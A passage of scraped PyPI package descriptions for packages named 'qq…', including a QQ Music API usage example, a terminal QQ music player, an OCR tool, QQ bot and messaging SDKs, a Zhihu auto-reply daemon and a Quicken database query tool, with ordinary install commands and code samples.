\u76f4\u63a5\u4e0b\u8f7d\uff0c\u4e5f\u53ef\u4ee5\u5728\u6d4f\u89c8\u5668\u4e2d\u76f4\u63a5\u6253\u5f00>>>resp=requests.get(song.song_url(),headers={'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'})>>>withopen('music.m4a','wb')asfw:...fw.write(resp.content)...4210605>>>song.subtitle# \u67e5\u8be2\u5230\u7684\u4ec5\u6709\u57fa\u7840\u4fe1\u606f>>>song.extract()# 
\u83b7\u53d6\u6b4c\u66f2\u7684\u8be6\u7ec6\u4fe1\u606f>>>song.subtitle'\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c1\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c7-8\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c10-12\u96c6\u7247\u5934\u66f2'>>>song.transname\"\u65e0\u6cd5\u4f20\u8fbe\u7684\u7231\u604b'13\">>>song.extras_name\"\u5c4a\u304b\u306a\u3044\u604b '13\"Lyric>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')>>>song=music_list.data[0]>>>lyric=song.lyric>>>type(lyric)>>>lyric.extract()>>>lyric.lyric\"[ti:\u5c4a\u304b\u306a\u3044\u604b '13(TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP)]\\n[ar:\u4e0a\u539f\u308c\u306a]\\n[al:TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP\u30c6\u30fc\u30de\u300c\u5c4a\u304b\u306a\u3044\u604b\u201913\u300d]\\n[by:]\\n[offset:0]\\n[00:00.01]\u5c4a\u304b\u306a\u3044\u604b '13 (\u65e0\u6cd5\u4f20\u8fbe\u7684\u7231\u604b'13) (\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c1\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c7-8\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c10-12\u96c6\u7247\u5934\u66f2) - \u4e0a\u539f\u308c\u306a (\u4e0a\u539f\u73b2\u5948)\\n[00:00.02]\u4f5c\u8a5e\uff1a\u9808\u8c37\u5c1a\u5b50\\n[00:00.03]\u4f5c\u66f2\uff1a\u77f3\u5ddd\u771f\u4e5f\\n\\n[00:00.04]\\n[00:25.10]\u5b64\u72ec\u306a\u3075\u308a\u3092\u3057\u3066\u308b\u306e?\\n[00:31.72]\u306a\u305c\u3060\u308d\u3046 \u6c17\u306b\u306a\u3063\u3066\u3044\u305f\\n[00:38.15]\u6c17\u3065\u3051\u3070 \u3044\u3064\u306e\u307e\u306b\u304b\\n[00:45.76]\u8ab0\u3088\u308a \u60f9\u304b\u308c\u3066\u3044\u305f\\n[00:54.06]\u3069\u3046\u3059\u308c\u3070 \u3053\u306e\u5fc3\u306f \u93e1\u306b\u6620\u308b\u306e?\\n[01:08.47]\u5c4a\u304b\u306a\u3044\u604b\u3092\u3057\u3066\u3044\u3066\u3082\\n[01:15.21]\u6620\u3057\u3060\u3059\u65e5\u304c\u304f\u308b\u304b\u306a\\n[01:21.45]\u307c\u3084\u3051\u305f\u7b54\u3048\u304c \u898b\u3048\u59cb\u3081\u308b\u307e\u3067\u306f\\n[01:29.38]\u4eca\u3082\u3053\u306e\u604b\u306f \u52d5\u304d\u51fa\u305b\u306a\u3044\\n[01:40.77]\\n[01:57.05]\u521d\u3081\u3066\u58f0\u3092\u304b\u3051\u305f\u3089\\n[02:04.23]\u632f\u308a\u5411\u3044\u3066\u304f\u308c\u305f\u3042\u306e\u65e5\\n[02:11.28]\u3042\u306a\u305f\u306f \u7729\u3057\u3059\u304e\u3066\\n[02:18.08]\u307e\u3063\u3059\u3050\u898b\u308c\u306a\u304b\u3063\u305f\\n[02:25.82]\u3069\u3046\u3059\u308c\u3070 \u305d\u306e\u5fc3\u306b \u79c1\u3092\u5199\u3059\u306e?\\n[02:37.67]\\n[02:40.30]\u53f6\u308f\u306a\u3044\u604b\u3092\u3057\u3066\u3044\u3066\u3082\\n[02:47.66]\u5199\u3057\u3060\u3059\u65e5\u304c\u304f\u308b\u304b\u306a\\n[02:53.84]\u307c\u3084\u3051\u305f\u7b54\u3048\u304c \u5c11\u3057\u3067\u3082\u898b\u3048\u305f\u3089\\n[03:02.26]\u304d\u3063\u3068\u3053\u306e\u604b\u306f \u52d5\u304d\u306f\u59cb\u3081\u308b\\n[03:12.99]\\n[03:34.65]\u3069\u3046\u3059\u308c\u3070 \u3053\u306e\u5fc3\u306f \u93e1\u306b\u6620\u308b\u306e?\\n[03:45.32]\\n[03:48.19]\u5c4a\u304b\u306a\u3044\u604b\u3092\u3057\u3066\u3044\u3066\u3082\\n[03:55.24]\u6620\u3057\u3060\u3059\u65e5\u304c\u304f\u308b\u304b\u306a\\n[04:01.67]\u307c\u3084\u3051\u305f\u7b54\u3048\u304c \u898b\u3048\u59cb\u3081\u308b\u307e\u3067\u306f\\n[04:09.34]\u4eca\u3082\u3053\u306e\u604b\u306f \u52d5\u304d\u51fa\u305b\u306a\u3044\">>>lyric.trans\"[ti:\u5c4a\u304b\u306a\u3044\u604b '13(TV\u30a2\u30cb\u30e1\u300cWHITE 
ALBUM2\u300dOP)]\\n[ar:\u4e0a\u539f\u308c\u306a]\\n[al:TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP\u30c6\u30fc\u30de\u300c\u5c4a\u304b\u306a\u3044\u604b\u201913\u300d]\\n[by:]\\n[offset:0]\\n[00:00.00]//\\n[00:08.36]//\\n[00:16.73]//\\n[00:25.10]\u83ab\u975e\u4f60\u662f\u5728\u6545\u4f5c\u5b64\u72ec\uff1f\\n[00:31.72]\u4e3a\u4f55\u5fc3\u5982\u6b64\u4e3a\u4f60\u7275\u52a8\\n[00:38.15]\u56de\u8fc7\u795e\u6765 \u4e0d\u77e5\u4e0d\u89c9\\n[00:45.76]\u6211\u5df2\u7ecf\u88ab\u4f60\u6df1\u6df1\u5438\u5f15\\n[00:54.06]\u8981\u600e\u6837\u624d\u80fd\u5c06\u6211\u7684\u5fc3 \u6620\u5728\u955c\u4e2d\u8ba9\u4f60\u770b\u6e05\uff1f\\n[01:08.47]\u5373\u4f7f\u662f\u573a\u7ec8\u6210\u5962\u671b\u7684\u7231\u604b\\n[01:15.21]\u662f\u5426\u4e5f\u6709\u6620\u5728\u955c\u4e2d\u7684\u4e00\u5929\\n[01:21.45]\u5728\u80fd\u591f\u770b\u89c1\u9690\u7ea6\u7684\u66d9\u5149\u4e4b\u524d\\n[01:29.38]\u8fd9\u573a\u7231\u604b\u5982\u4eca\u4f9d\u7136\u5bf8\u6b65\u96be\u884c\\n[01:40.77]\\n[01:57.05]\u5f53\u6211\u7b2c\u4e00\u6b21\u51fa\u58f0\u76f8\u5524\\n[02:04.23]\u5f53\u4f60\u7b2c\u4e00\u6b21\u56de\u9996\u4e4b\u65f6\\n[02:11.28]\u4f60\u7684\u8eab\u5f71\u662f\u90a3\u4e48\u8000\u773c\\n[02:18.08]\u8ba9\u6211\u4e0d\u7981\u79fb\u5f00\u76ee\u5149\\n[02:25.82]\u8981\u600e\u6837\u624d\u80fd\u5c06\u6211\u7684\u540d\u6df1\u6df1\u5370\u5728\u4f60\u7684\u5fc3\u4e2d\uff1f\\n[02:37.67]\\n[02:40.30]\u5373\u4f7f\u662f\u573a\u6ca1\u6709\u7ed3\u679c\u7684\u7231\u604b\\n[02:47.66]\u662f\u5426\u4e5f\u6709\u6620\u5728\u4f60\u5fc3\u7684\u4e00\u5929\\n[02:53.84]\u54ea\u6015\u80fd\u770b\u89c1\u4e00\u4e1d\u9690\u7ea6\u7684\u66d9\u5149\\n[03:02.26]\u8fd9\u4efd\u7231\u604b\u4e00\u5b9a\u80fd\u591f\u5f00\u59cb\u8f6c\u52a8\\n[03:12.99]\\n[03:34.65]\u8981\u600e\u6837\u624d\u80fd\u5c06\u6211\u7684\u5fc3\u6620\u5728\u955c\u4e2d\u8ba9\u4f60\u770b\u6e05\uff1f\\n[03:45.32]\\n[03:48.19]\u5373\u4f7f\u662f\u573a\u7ec8\u6210\u5962\u671b\u7684\u7231\u604b\\n[03:55.24]\u662f\u5426\u4e5f\u6709\u6620\u5728\u955c\u4e2d\u7684\u4e00\u5929\\n[04:01.67]\u5728\u80fd\u591f\u770b\u89c1\u9690\u7ea6\u7684\u66d9\u5149\u4e4b\u524d\\n[04:09.34]\u8fd9\u573a\u7231\u604b\u5982\u4eca\u4f9d\u7136\u5bf8\u6b65\u96be\u884c\\n[04:20.90]\"Singer>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')>>>song=music_list.data[0]>>>song.singer# \u4e00\u9996\u6b4c\u53ef\u80fd\u7531\u591a\u4eba\u5408\u5531\uff0c\u56e0\u6b64\u7ed3\u679c\u4e3a\u4e00\u4e2a\u5217\u8868[]>>>singer=song.singer[0]>>>type(singer)>>>singer.singer_mid'003jYRDr3aQCKi'>>>singer.name'\u4e0a\u539f\u308c\u306a'>>>singer.title'\u4e0a\u539f\u308c\u306a (\u4e0a\u539f\u73b2\u5948)'>>>singer.url'https://y.qq.com/n/yqq/singer/003jYRDr3aQCKi.html'>>>singer.extract()# \u83b7\u53d6\u8be6\u7ec6\u4fe1\u606f>>>singer.hot_music[,,,,,,, , , , ,,,,,,,,,,,,,,,,,,,]>>>singer_songs=singer.songs()>>>singer_songs,cursor_page=1,page_size=3,total_num=74>SingerSongPager\u7c7b\u4f3cSongSearchPagerTODO\u6b4c\u66f2\u6392\u884c\u699c\u7684\u83b7\u53d6\u6b4c\u624b\u67e5\u8be2\u5206\u7c7b\u6b4c\u5355\u4e13\u8f91MV\u4f18\u5148\u7ea7\uff1a\u65e0\uff08\u6ca1\u6709\u53cd\u9988\uff0c\u6211\u7684\u624b\u4f1a\u6296\uff09"} +{"package": "qqmusicbox", "pacakge-description": "# QQMusicBox![Build Status](https://travis-ci.org/lai-bluejay/qqmusicbox.svg?branch=master)\n![PyPI](https://img.shields.io/pypi/v/qqmusicbox.svg?style=flat)\n![GitHub code size in 
bytes](https://img.shields.io/github/languages/code-size/lai-bluejay/qqmusicbox.svg)\u53ea\u8981\u6709\u58f0\u5361\uff0c\u547d\u4ee4\u884c\u4e5f\u80fd\u64ad\u653e\u97f3\u4e50\u770b\u5230\u4e00\u6b3e[\u547d\u4ee4\u884c\u7684\u7f51\u6613\u4e91\ud83c\udfb5](https://github.com/darknessomi/musicbox/)\uff0c\u5fcd\u4e0d\u4f4f\u60f3\u7167\u7740\u5f00\u53d1\u4e00\u4e2a\u540c\u6b3e\u7684QQ\u97f3\u4e50\uff0c\u6574\u4f53\u4ee3\u7801\u7ed3\u6784\u8fd8\u662f\u53c2\u8003darkness\u7684\u7248\u672c\uff0c\u5728\u6b64\u7248\u672c\u4e0a\u5fae\u8c03\u3002qq\u97f3\u4e50api\u4f1a\u548c[meik-h](https://github.com/MeiK-h/QQMusicAPI)\u4e00\u8d77\u7ef4\u62a4## \u7279\u6027\u6682\u65f6\u53ea\u652f\u6301\u641c\u7d22\u97f3\u4e50\u2026\u2026.### \u952e\u76d8\u5feb\u6377\u952eKey | Effect | |\u2014\u2013 | \u2014\u2014\u2014\u2014\u2014 | \u2014\u2014\u2014 |j | Down | \u4e0b\u79fb |k | Up | \u4e0a\u79fb |h | Back | \u540e\u9000 |l | Forword | \u524d\u8fdb |u | Prev page | \u4e0a\u4e00\u9875 |d | Next page | \u4e0b\u4e00\u9875 |f | Search | \u5feb\u901f\u641c\u7d22 |[ | Prev song | \u4e0a\u4e00\u66f2 |] | Next song | \u4e0b\u4e00\u66f2 |= | Volume + | \u97f3\u91cf\u589e\u52a0 |- | Volume - | \u97f3\u91cf\u51cf\u5c11 |Space | Play/Pause | \u64ad\u653e/\u6682\u505c |m | Menu | \u4e3b\u83dc\u5355 |p | Present/History | \u5f53\u524d/\u5386\u53f2\u64ad\u653e\u5217\u8868 |i | Music Info | \u5f53\u524d\u97f3\u4e50\u4fe1\u606f |\u21e7+p | Playing Mode | \u64ad\u653e\u6a21\u5f0f\u5207\u6362 |\u21e7+a | Enter album | \u8fdb\u5165\u4e13\u8f91 |g | To the first | \u8df3\u81f3\u9996\u9879 |\u21e7+g | To the end | \u8df3\u81f3\u5c3e\u9879 |## \u5b89\u88c5### \u5fc5\u9009\u4f9d\u8d56mpg123\u7528\u4e8e\u64ad\u653e\u6b4c\u66f2 \u81ea\u884c\u641c\u7d22\u4e00\u4e0b\u5b89\u88c5\u529e\u6cd5\u5427### PyPi\u5b89\u88c5$ pip install qqmusicbox### Git clone\u5b89\u88c5master\u5206\u652f$ git clonehttps://github.com/lai-bluejay/qqmusicbox.git&& cd qqmusicbox\n$ python setup.py install### macOS\u5b89\u88c5$ pip install qqmusicbox\n$ brew install mpg123### Linux\u5b89\u88c5#### Ubuntu/Debian$ (sudo) pip install qqmusicbox$ (sudo) apt-get install mpg123#### Centos/Red Hat$ (sudo) pip(3) install qqmusicbox\n$ (sudo) wgethttp://mirror.centos.org/centos/7/os/x86_64/Packages/mpg123-1.25.6-1.el7.x86_64.rpm$ (sudo) yum install mpg123-1.25.6-1.el7.x86_64.rpm"} +{"package": "qqocr", "pacakge-description": "QQOcrA package used for simple OCR.Github:https://github.com/SummerColdWindContact the author:jugking6688@gmail.comOur bilibili:https://space.bilibili.com/3493127383943735Examples are as follows\uff1aFor learn:fromqqocrimportQQOcr# You must provide a method to binarize the characters in the picture# and import the external library in the function.defbinary(image):importnumpyasnpimportcv2low_range=np.array([0,0,0][::-1])high_range=np.array([100,100,100][::-1])returncv2.inRange(image,low_range,high_range)qq=QQOcr()# Dataset folder consists of many pictures and a 'label.txt'.# For 'label.txt', the format of each line is \"[filename]\\t[text]\".# For example, it can be: \"1.png 12345\".qq.load_dataset('./dataset')qq.set_binary(binary)qq.learn()# The suffix must be '.qmodel'.qq.save_model('./1.qmodel')For predict:fromqqocrimportQQOcrimportcv2qq=QQOcr()qq.load_model('./1.qmodel')text=qq.predict(cv2.imread('test.png'))print(text)"} +{"package": "qq_palindrome", "pacakge-description": "No description available on PyPI."} +{"package": "qqpat", "pacakge-description": "No description available on PyPI."} +{"package": "qq-picture-operation", "pacakge-description": 
"QQ_picture_operation\u8fdb\u884cqq\u56fe\u7247\u7684\u64cd\u4f5c\uff0c\u7528\u6765\u8f6c\u79fb\u590d\u5236\u5220\u9664\u56fe\u7247"} +{"package": "qq-plot", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qqpusher", "pacakge-description": "QQPUSHER\u672c\u9879\u76ee\u662fQQPusher\u548cQQPusherPro\u7684Python SDKQQPusher\u7684\u4f7f\u7528\u65b9\u6cd5\u8bf7\u53c2\u8003http://qqpusher.yanxianjun.com/QQPusherPro\u7684\u4f7f\u7528\u65b9\u6cd5\u8bf7\u53c2\u8003http://qqpusherpro.yanxianjun.com/\u672c\u9879\u76ee\u7684\u4f7f\u7528pip install qqpusherDemo\u8fd9\u91cc\u7684id\u53ef\u4ee5\u662fqq\u53f7\u4e5f\u53ef\u662fqq\u7fa4\u53f7importqqpusherimporttimeToken=\"xxxxxxxxxxxxxxxx\"Group_Id=\"xxxxxxxxxx\"Private_Id=\"xxxxxxxxxx\"if__name__=='__main__':qqpush1=qqpusher.qqpusher(token=Token,id=Private_Id,auto_escape=False)print(qqpush1.send_private_msg(\"\u6d4b\u8bd5\u79c1\u804a\u6d88\u606f\"))time.sleep(10)qqpush2=qqpusher.qqpusher(token=Token,id=Group_Id,auto_escape=False)print(qqpush2.send_group_msg(\"\u6d4b\u8bd5\u7fa4\u7ec4\u6d88\u606f\"))time.sleep(10)print(qqpush2.set_group_mute_all(True))time.sleep(10)print(qqpush2.set_group_mute(Private_Id,60))time.sleep(10)print(qqpush2.set_group_name(\"\u6d4b\u8bd5\u7fa4\u540d\"))time.sleep(10)print(qqpush2.set_group_memo(\"\u6d4b\u8bd5\u7fa4\u516c\u544a\"))\u51fd\u6570\u5217\u8868qqpushersend_private_msgsend_group_msgset_group_mute_allset_group_muteset_group_nameset_group_memoqqpusherproget_state_infosend_friend_msgsend_friend_jsonsend_friend_xmlsend_group_msgsend_group_jsonsend_group_xmladd_frienddelete_friendhandle_friend_eventjoin_groupquit_groupall_banbankick_group_memberadd_event\u9e23\u8c22yanxianjun\u5f00\u53d1\u7ef4\u62a4\u7684QQPusher\u63a8\u9001\u670d\u52a1"} +{"package": "qq.py", "pacakge-description": "\u2728 \u7528 Python \u7f16\u5199\u7684\u7528\u4e8e QQ\u9891\u9053\u673a\u5668\u4eba \u7684\u73b0\u4ee3\u5316\u3001\u6613\u4e8e\u4f7f\u7528\u3001\u529f\u80fd\u4e30\u5bcc\u4e14\u5f02\u6b65\u7684 API\u3002 \u2728\u4e3b\u8981\u7279\u70b9\u4f7f\u7528async\u548cawait\u7684\u73b0\u4ee3 Pythonic API\u3002\u4f18\u5316\u901f\u5ea6\u548c\u5185\u5b58\u3002\u5b89\u88c5\u9700\u8981 Python 3.8\u6216\u4ee5\u4e0a\u7684\u7248\u672c\u548c\u4e00\u6839\u63a5\u5165\u4e92\u8054\u7f51\u7684\u7f51\u7ebf\u3002\u8981\u5b89\u88c5\u5e93\uff0c\u4f60\u53ea\u9700\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1apip3 install -U qq.py\u5feb\u901f\u793a\u4f8bfromqqimport*classMyClient(Client):asyncdefon_ready(self):print('\u4f7f\u7528',self.user,'\u767b\u9646')asyncdefon_message(self,message):# \u4e0d\u8981\u56de\u590d\u81ea\u5df1ifmessage.author==self.user:returnif'ping'inmessage.content:awaitmessage.channel.send('pong')if__name__=='__main__':client=MyClient()client.run(token='app_id.token')Bot \u793a\u4f8bimportqqfromqq.extimportcommandsbot=commands.Bot(command_prefix='>',owner_id='\u4f60\u7684\u7528\u6237ID')# owner_id \u662f int \u7c7b\u578b@bot.eventasyncdefon_ready():print(f'\u4ee5{bot.user}\u8eab\u4efd\u767b\u5f55\uff08ID\uff1a{bot.user.id}\uff09')print('------')@bot.command()asyncdefping(ctx):awaitctx.send('pong')bot.run('app_id.token')\u4f60\u53ef\u4ee5\u5728 example \u76ee\u5f55\u4e2d\u627e\u5230\u66f4\u591a\u793a\u4f8b\u3002\u94fe\u63a5\u6587\u6863QQ API\u5e2e\u52a9 QQ \u7fa4 - 583799186\u975e\u5b98\u65b9 Discord \u670d\u52a1\u5668"} +{"package": "qqq", "pacakge-description": "No description available on PyPI."} +{"package": "qqq22-nash", "pacakge-description": "No description available on PyPI."} +{"package": "qqqfome", 
"pacakge-description": "# Thank you follow me - \u8c22\u8c22\u4f60\u5173\u6ce8\u6211\u5440\uff01## \u7b80\u4ecb\u8fd9\u662f\u4e00\u4e2a\u7528\u4e8e\u81ea\u52a8\u7ed9\u77e5\u4e4e\u91cc\u4f60\u7684\u65b0\u5173\u6ce8\u8005\u53d1\u9001\u4e00\u6761\u4fe1\u606f\u7684\u540e\u53f0\u670d\u52a1\u3002\u6280\u672f\u6808\u4ec0\u4e48\u7684\u975e\u5e38\u7b80\u5355\uff1a- \u4ee5\u524d\u5199\u7684 `zhihu-py3` \u7528\u4e8e\u83b7\u53d6\u77e5\u4e4e\u4fe1\u606f- \u7528 `sqlite` \u6570\u636e\u5e93\u4fdd\u5b58\u8001\u7684\u5173\u6ce8\u8005- `daemon.py` \u7528\u4e8e\u5728 *unix \u73af\u5883\u4e0b\u521b\u5efa daemon proc## \u4f7f\u7528### \u5b89\u88c5```bashsudo python3 install qqqfome```### \u521b\u5efa\u5de5\u4f5c\u76ee\u5f55```bashcd /path/that/you/wantmkdir qqqfome_workcd qqqfome_work```### \u521d\u59cb\u5316\u6570\u636e\u5e93```bashqqqfome -v init```\u7136\u540e\u6839\u636e\u63d0\u793a\u767b\u5f55\u77e5\u4e4e\u3002\u8fc7\u7a0b\u4e2d\u9700\u8981\u9a8c\u8bc1\u7801\u2026\u2026\u5982\u679c\u4f60\u662f\u5728VPS\u4e0a\u90e8\u7f72\u7684\u8bdd\uff0c\u4f60\u5f97\u60f3\u529e\u6cd5\u628a `captcha.gif` \u6587\u4ef6\u4ece\u8fdc\u7a0b\u670d\u52a1\u5668\u5f04\u5230\u672c\u5730\u6765\u67e5\u770b\u9a8c\u8bc1\u7801\u2026\u2026\u5176\u5b9e\u6211\u66f4\u5efa\u8bae\u5728\u672c\u5730\u7528 `zhihu-py3` \u751f\u6210 cookies \u518d\u5f04\u5230 VPS \u4e0a\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\uff1a```bashqqqfome -c /path/to/cookie -v init```\u6765\u7701\u7565\u767b\u5f55\u6b65\u9aa4\u3002\u5982\u679c\u4e00\u5207\u6b63\u5e38\u7684\u8bdd\uff0c\u4f60\u4f1a\u5f97\u5230\u4e00\u4e2a sqlite \u6570\u636e\u5e93\u6587\u4ef6\u3002\u540d\u5b57\u662f `.sqlite3`### \u542f\u52a8```bashqqqfome -m $'I\\'m {my_name}:\\nThank you follow me.' -d start .sqlite3```\uff08\u5982\u679c\u53ea\u662f\u6d4b\u8bd5\u7684\u8bdd\uff0c\u53ef\u4ee5\u53bb\u6389 `-d` \u53c2\u6570\uff0c\u8ba9\u4ed6\u5728\u524d\u53f0\u6a21\u5f0f\u8fd0\u884c\u3002\uff09`-m` \u53c2\u6570\u540e\u8ddf\u9700\u8981\u53d1\u9001\u7684\u4fe1\u606f\u3002\u6ce8\u610f\uff0c\u5982\u679c\u4f60\u5728\u6d88\u606f\u5185\u90e8\u4f7f\u7528\u4e86\u8f6c\u4e49\u5b57\u7b26\uff0c\u90a3\u4e48\u5355\u5f15\u53f7\u524d\u7684`$`\u7b26\u53f7\u662f\u5fc5\u9700\u7684\u3002\u6216\u8005\u4f60\u53ef\u4ee5\u5c06\u4fe1\u606f\u5199\u5728\u4e00\u4e2a\u6587\u4ef6\u91cc\uff0c\u7136\u540e\u4f7f\u7528 `-M` \u53c2\u6570\u6307\u5b9a\u6b64\u6587\u4ef6\u3002\u4e24\u4e2a\u90fd\u6ca1\u6709\u6307\u5b9a\u7684\u8bdd\uff0c\u9ed8\u8ba4\u7684\u6d88\u606f\u662f\uff1a```text\u4f60\u597d{your_name}\uff0c\u6211\u662f{my_name}\uff0c\u8c22\u8c22\u4f60\u5173\u6ce8\u6211\uff0c\u4f60\u662f\u6211\u7684\u7b2c{follower_num}\u53f7\u5173\u6ce8\u8005\u54df\uff01\u672c\u6d88\u606f\u7531qqqfome\u9879\u76ee\u81ea\u52a8\u53d1\u9001\u3002\u9879\u76ee\u5730\u5740\uff1ahttps://github.com/7sDream/qqqfome{now}```\u7a0b\u5e8f\u652f\u6301\u7684\u4e5f\u5c31\u662f\u4f8b\u5b50\u91cc\u7684\u8fd9\u51e0\u4e2a\u5b8f\u4e86\u2026\u2026## \u67e5\u770bLog```bashtail -f .sqlite3.log```\u9ed8\u8ba4\u7684 log \u6587\u4ef6\u540d\u662f `.sqlite3.log`\u8fd8\u6709\u4e00\u4e2a\u662f `.sqlite3.pid` \u8fd9\u4e2a\u6587\u4ef6\u4e0d\u8981\u5220\u3002### \u505c\u6b62\u5982\u679c\u4e0d\u662f\u540e\u53f0\u6a21\u5f0f\uff0c`Ctrl-C` \u5373\u53ef\u505c\u6b62\u3002\u5982\u679c\u662f Daemon \u6a21\u5f0f\uff0c\u5219\uff1a```bashqqqfome stop ```## \u6587\u6863\u8fd8\u6ca1\u5199\uff0c\u6682\u65f6\u7528 `qqqfome -h` \u51d1\u5408\u770b\u5427\u3002```textusage: qqqfome [-h] [-v] [-c FILE] [-p FILE] [-l FILE] [-t INTERVAL][-m MESSAGE | -M FILE] [-s NUM] [-d]{init,start,stop} 
[file]Thank-you-follow-me cli.positional arguments:{init,start,stop} command that you want execfile database file that you want run on.optional arguments:-h, --help show this help message and exit-v, --verbose turn on this to print info-c FILE, --cookies FILEprovide cookies file if you have to skip login-p FILE, --pid-file FILEpid file location-l FILE, --log-file FILElog file location-t INTERVAL, --time INTERVALset the interval time-m MESSAGE, --message MESSAGEthe message that you want to send to your new follower-M FILE, --message-file FILEthe message that you want to send to your new follower-s NUM, --stop-at NUMfound NUM continuously old followers will stop pass-d, --daemon work in daemon mode```## TODO- \u589e\u52a0 update \u547d\u4ee4\uff0c\u7528\u4e8e\u66f4\u65b0\u6570\u636e\u5e93\u91cc\u7684 cookies- \u9009\u9879 `--mc` \u6216\u8005\u7c7b\u4f3c\u7684\u4e1c\u897f\uff0c\u7528\u4e8e\u968f\u673a\u4ece\u6587\u4ef6\u4e2d\u9009\u53d6\u4e00\u6bb5\u6587\u672c\uff08\u4e00\u884c\uff0c\u6216\u8005\u4ee5\u7279\u5b9a\u5206\u9694\u7b26\u5206\u9694\u7684\u4e00\u6bb5\uff09\u7528\u4f5c message\u3002- \u5199\u4e2a\u6559\u7a0b- \u5b8c\u5584 readme \u548c \u6587\u6863- \u91cd\u6784\u4ee3\u7801- \u5199\u6d4b\u8bd5## LICENSEEMIT."} +{"package": "qqqq", "pacakge-description": "UNKNOWN"} +{"package": "qqq-test-hjahd", "pacakge-description": "\u7b80\u5355\u7684\u52a0\u51cf\u8fd0\u7b97\u4e0a\u4f20\u6d4b\u8bd5"} +{"package": "qqr", "pacakge-description": "QQR - a python library for QR code restorationA blazingly fast QR code restoration library for Python.Controlling the version number with bumpversionWhen you want to increment the version number for a new release usebumpversionto do it correctly across the whole library.\nFor example, to increment to a new patch release you would simply runbumpversion patchwhich given the.bumpversion.cfgmakes a new commit that increments the release version by one patch release."} +{"package": "qqsuperman", "pacakge-description": "UNKNOWN"} +{"package": "qqtest01", "pacakge-description": "This is the homepage of our project"} +{"package": "qq-training-wheels", "pacakge-description": "qq-training-wheels"} +{"package": "qq-tr-free", "pacakge-description": "qq-tr-freeQq translate for freeInstallationpip install qq-tr-free -UorInstall (pip or whatever) necessary requirements, e.g.pip install requests_cache jmespath fuzzywuzzyorpip install -r requirements.txtclone the repo (e.g.,git clone https://github.com/ffreemt/qq-tr-free.gitor downloadhttps://github.com/ffreemt/qq-tr-free/archive/master.zipand unzip) and change to the qq-tr-free folder and do apython setup.py developorpython setup.py installUsagefrom qq_tr import qq_tr\nprint(qq_tr('hello world')) # -> '\u4f60\u597d\u4e16\u754c'\nprint(qq_tr('hello world', to_lang='de')) # ->'Hallo Welt'\nprint(qq_tr('hello world', to_lang='fr')) # ->'Bonjour \u00e0 tous.'AcknowledgmentsThanks to everyone whose code was used"} +{"package": "qquant", "pacakge-description": "bayinfA library for Bayesian InferenceInstallationpip install --upgrade bayinf"} +{"package": "qquery", "pacakge-description": "This package provides a simple interface for reading Quicken For Mac databases. It inlcudes both a\npython module and a command line interface.Locating the DatabaseQuicken For Mac keeps its user files in~/Library/Application Support/Quicken.\nIn that directory the database file is inDocuments/Qdata.quicken/data(or thereabouts).\nFor safety, do not operate directly on this file. 
Make a copy as, for example:# cd '~/Library/Application Support/Quicken'\n# cd Documents/Qdata.quicken\n# cp data /tmp/copyofqdata\n# cd /tmp\n# file copyofqdata\ncopyofqdata: SQLite 3.x database, last written using SQLite version 3036000The output of the last command verifies that the file is ansqlitedatabase.Command Line ToolThe command line tool, also calledqquery, provides a simple, convenient interface to the database.\nIt offers many options, all of which are described with the \u2013help switch:# qquery --helpHere are some examples.List all accounts:# qquery --qdb=copyofqdata --list-accountsList all categories:# qquery --qdb=copyofqdata --list-categoriesList all transactions (this can create a lot of output):# qquery --qdb=copyofqdata --list-transactionsList only transations from account \u201cFirst National\u201d, category \u201cCharity\u201d, posted during the year 2016:# qquery --qdb=copyofqdata --list-transactions \\\n --restrict-to-accounts=\"First National\" \\\n --restrict-to-categories=\"Charity\" \\\n --date-from=2016-01-01 --date-to=2016-12-31Report on the balances (including details of secuities) of all accounts as of December 31, 2016.\n(Accounts with zero balance will not be listed):# qquery --qdb=copyofqdata --report-holdings --date-to=2016-12-31Python moduleThe module may be included in python programs in the the usual way. Help is also available.\nUse the following to get a list of all available functions:>>> import qquery\n>>> help (qquery)Here is how to list all accounts using the iterator provided by the functiongetAccounts().\nEach pass through the loop returns a dictionary for each account:>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for account in qq.getAccounts():\n... print account\n...Similarly, this is how to list all categories by using the iterator provided by the functiongetCategories().\nEach pass through the loop returns a dictionary for each category:>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for category in qq.getCategories():\n... print category\n...And for all transactions usinggetTransactions():>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for trans in qq.getTransactions():\n... print trans\n...There are many fields supplied with eachtransdictionary, so the above will produce\na lot of output. One may instead choose to examine only some of those fields as in>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> for trans in qq.getTransactions():\n... print trans['date'], trans['amount'], trans['payeeName']\n...This can be further refined using thesetRestrictTofunctions, for example:>>> import qquery as qq\n>>> qq.open ('copyofqdata')\n>>> qq.setRestrictToAccounts ('First National')\n>>> qq.setRestrictToCategories ('Charity,Gifts')\n>>> qq.setRestrictToDates (dateFrom='2016-01-01', dateTo='2016-12-31')\n>>> for trans in qq.getTransactions():\n... 
print trans['date'], trans['amount'], trans['payeeName']\n...Next StepsThere is a lot more information in the Quicken database than is exposed through this interface."}
